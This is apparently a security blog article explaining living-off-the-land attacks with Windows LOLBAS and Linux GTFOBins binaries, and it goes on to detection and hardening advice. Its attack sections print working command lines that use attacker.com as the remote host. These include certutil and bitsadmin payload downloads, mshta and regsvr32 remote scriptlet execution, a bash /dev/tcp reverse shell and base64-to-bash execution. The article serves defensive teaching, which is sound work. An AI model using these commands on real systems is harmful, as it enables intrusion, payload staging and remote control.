Living-Off-the-Land Attacks: How Hackers Abuse LOLBins and LOLBAS

Modern attackers rarely bring their own tools. Instead, they weaponize the binaries already installed on your operating system — Microsoft-signed executables that your EDR and antivirus trust implicitly. This technique is called living off the land, and the binaries abused are collectively known as LOLBins (Living Off the Land Binaries) on Linux/macOS and LOLBAS (Living Off the Land Binaries and Scripts) on Windows.

Why Living-Off-the-Land Works So Well

Traditional security tools build their detection logic around known-bad signatures and suspicious file hashes. When an attacker executes a payload using certutil.exe — a legitimate Windows certificate utility — the AV sees a trusted, signed Microsoft binary doing its job. The malicious behavior hides behind a mask of legitimacy.

There are three main reasons LOLBAS attacks succeed:

1. Trust inheritance — These binaries are signed by Microsoft and trusted by default
2. Whitelisting blind spots — Application control policies often explicitly allow system binaries
3. Blend-in with normal traffic — powershell.exe making an outbound connection looks like normal admin activity

The LOLBAS Project

The LOLBAS Project (lolbas-project.github.io) catalogs every Windows binary, library, and script that can be abused for offensive purposes. Each entry documents:

• Execute — run arbitrary code
• Download — pull files from the internet
• Upload — exfiltrate data
• Bypass — evade security controls
• Credentials — dump or manipulate credentials

As of 2026, the project documents over 200 entries. Here are the most actively abused.

Top Abused LOLBins on Windows

certutil.exe

Originally designed to manage certificates, certutil can download files and decode Base64:

# Download a file from the internet
certutil.exe -urlcache -split -f http://attacker.com/payload.exe C:\Windows\Temp\p.exe

# Decode a Base64-encoded file
certutil.exe -decode encoded.b64 decoded.exe

Real-world use: Used extensively by APT groups like Lazarus and various ransomware operators for initial payload staging.

mshta.exe

The Microsoft HTML Application Host runs .hta files — HTML documents with embedded VBScript or JScript that execute with full script permissions:

mshta.exe http://attacker.com/evil.hta
mshta.exe javascript:a=GetObject("script:http://attacker.com/payload.sct").Exec();close();

HTA files bypass many browser security restrictions because mshta.exe is a trusted host process.

regsvr32.exe

regsvr32 can load remote scriptlets (.sct files) — a technique known as Squiblydoo:

regsvr32.exe /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

This technique executes JScript or VBScript remotely without writing any file to disk first, and regsvr32.exe makes outbound HTTP connections that many proxies permit.

bitsadmin.exe

The Background Intelligent Transfer Service admin tool can download files:

bitsadmin /transfer myJob /download /priority high http://attacker.com/beacon.exe C:\Windows\Temp\beacon.exe

BITS jobs also persist across reboots by default, making this useful for maintaining persistence.

wmic.exe

Windows Management Instrumentation Command-line can execute processes locally or remotely:

wmic process call create "powershell.exe -enc <payload>"
wmic /node:TARGET process call create "cmd.exe /c whoami > C:\out.txt"

rundll32.exe

Loads and executes DLL exports. Attackers use it to run malicious DLLs without creating a new process in an obvious way:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("payload.exe")

LOLBAS on Linux and macOS

Linux and macOS have their own equivalent LOLBins, documented at gtfobins.github.io:

Binary	Abuse Technique
curl / wget	Download payloads, exfiltrate data
python3	Spawn reverse shells, read files
nc (netcat)	Bind/reverse shells
bash	Execute base64-decoded payloads inline
openssl	Encrypted reverse shells
find	Execute commands via -exec
awk / perl	One-liner reverse shells

A common Linux pivot after gaining initial access:

# Reverse shell using only bash (no netcat required)
bash -i >& /dev/tcp/attacker.com/4444 0>&1

# Base64-decode and execute in memory
echo "cGF5bG9hZA==" | base64 -d | bash

How Attackers Chain LOLBins Together

Sophisticated attackers rarely use just one LOLBin. They chain them to complicate detection:

1. A phishing email delivers a Word document with a macro
2. The macro calls mshta.exe with a remote URL
3. The HTA file calls certutil.exe to decode a payload stored as Base64 in the registry
4. The payload is executed via rundll32.exe
5. Persistence is established via bitsadmin job

Each hop uses a different trusted binary, and no single step looks definitively malicious in isolation.

Detection Strategies

Command-Line Argument Logging

Most LOLBAS abuse is detectable through the command-line arguments passed to these binaries. Enable Process Creation Auditing (Event ID 4688) with command-line logging:

Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy
> Detailed Tracking > Audit Process Creation = Success

And enable command-line capture:

Administrative Templates > System > Audit Process Creation
> Include command line in process creation events = Enabled

Sigma Rules for LOLBAS

Sigma is the open standard for SIEM detection rules. The SigmaHQ repository contains hundreds of rules targeting LOLBAS abuse. Example rule concept for certutil downloading:

title: Certutil Download
status: stable
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains:
      - '-urlcache'
      - '-decode'
  condition: selection

Import these into Splunk, Elastic SIEM, or Microsoft Sentinel.

Sysmon Event ID 1 + Network Events

Sysmon Event ID 1 (Process Creation) captures full command lines. Combine with Event ID 3 (Network Connection) to catch LOLBins making unexpected outbound connections:

• certutil.exe connecting to external IPs
• mshta.exe making HTTP/HTTPS connections
• regsvr32.exe with network activity

Microsoft Defender Attack Surface Reduction

Enable these ASR rules to block the most common LOLBAS techniques:

Rule Name	GUID
Block executable content from email/webmail	BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550
Block Office apps from creating child processes	D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Block JavaScript or VBScript from launching downloads	D3E037E1-3EB8-44C8-A917-57927947596D
Block process creations from PSExec and WMI	D1E49AAC-8F56-4280-B9BA-993A6D77406C

Hardening Recommendations

• AppLocker or WDAC: Block mshta.exe, wscript.exe, cscript.exe, and regsvr32.exe for standard users
• Restrict certutil: Block outbound HTTP from certutil.exe at the proxy/firewall level
• Constrained PowerShell: Enable PowerShell Constrained Language Mode
• User privilege limits: Standard users should not be able to write to C:\Windows\Temp
• Egress filtering: Only allow outbound HTTP/HTTPS from approved applications via a proxy

Conclusion

Living-off-the-land attacks are effective precisely because they exploit trust. By using tools that are already installed, signed, and whitelisted, attackers sidestep an enormous portion of the security stack. Defense requires shifting from blacklisting bad tools to monitoring the behavior of good ones — what they connect to, what child processes they spawn, and what commands they run. The LOLBAS Project is an excellent starting point for understanding your exposure.